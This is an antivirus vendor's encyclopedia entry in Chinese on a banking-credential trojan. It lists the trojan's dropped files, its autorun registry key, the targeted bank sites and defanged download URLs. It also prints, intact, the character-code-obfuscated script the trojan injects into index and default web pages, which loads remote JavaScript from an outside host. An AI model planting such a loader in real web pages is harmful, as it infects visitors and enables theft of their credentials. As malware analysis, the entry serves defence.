爱毒霸社区
拒绝当“肉鸡” 保安获大奖!
顽固病毒解决方案大全
一点一滴学电脑应用技巧
毒霸2008教程——清理专家
欺骗是攻击者最热衷的手法
爱毒霸社区推荐安全工具下载
如何使用命令行查毒
远程清除机器狗病毒实战
清理专家在手,菜鸟杀毒不愁
如何判断进程或程序是否安全
windows安全漏洞的解释索引
史上最强磁碟机病毒清除思路
金山ARP防火墙1.2版功能简介
Win32.Troj.Dropper.c.1261243
病毒名称(中文):
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
木马程序
病毒长度:
1261243
影响系统:
WinNT Win2000 WinXP Win2003
病毒行为:
这是一个会盗取用户信息的木马程序。病毒运行后,将隐蔽安装到用户计算机,并增加启动项以自启动。病毒通过运行一个隐藏的SoundMan.exe进程,监控用户是否打开了
指定的网上银行网址,如果是则监控用户鼠标状态,盗取用户银行帐号密码等信息,并发送至黑客邮箱。请广大使用网上银行的用户注意目录下是否存在该病毒文件,以便预防。
另外,该病毒还会修改硬盘中文件名为"index.*"和"default.*"的网页文件,插入病毒代码,并下载大量隐蔽软件安装至用户电脑,使用户计算机安全受到危胁。
1.生成文件
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\dll.fnr
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\eAPI.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\mon
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\SOUNDMAN.EXE
2.注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SoundNan "%commonfiles%\Microsoft Shared\web server extensions\40\bots\vinavbar\SOUNDMAN.EXE"
3.修改硬盘中文件为"index.*"和"default.*"的网页文件
index.asp
index.jsp
index.php
index.htm
index.html
default.asp
default.jsp
default.php
default.htm
default.html
并插入以下脚本
t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,99,115,46,99,115,107,105,99,107,46,99,110,47,99,115,47,115,99,46,106,115,62,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);
4.盗取以下网上银行用户信息,并发送至黑客163.com邮箱
招商银行网上支付中心
招商银行一网通-个人银行大众版hxxps://pbsz.ebank.cmbchina.com
中国农业银行hxxp://www.abchina.com
中信银行网上银行hxxps://personal.bank.ecitic.com:444
公司银行介绍_中信金融网hxxps://homebank.citicib.com.cn:91/
浦东发展银行hxxps://ebanks.spdb.com.cn
5.尝试连接远程服务器,下载大量隐蔽软件安装至用户计算机
hxxp://bbs.xxxx.com/pic/logo6.jpg
hxxp://cs.csxxxx.cn/cs/2.jpg
特别提示:上述描述仅为金山软件进行病毒或其他恶意、不良程序测试过程中的事实情况记录,病毒或其他恶意、不良程序在不同的软硬件环境下具体行为可能存在差异,该显示结果并不必然具备推广适用性。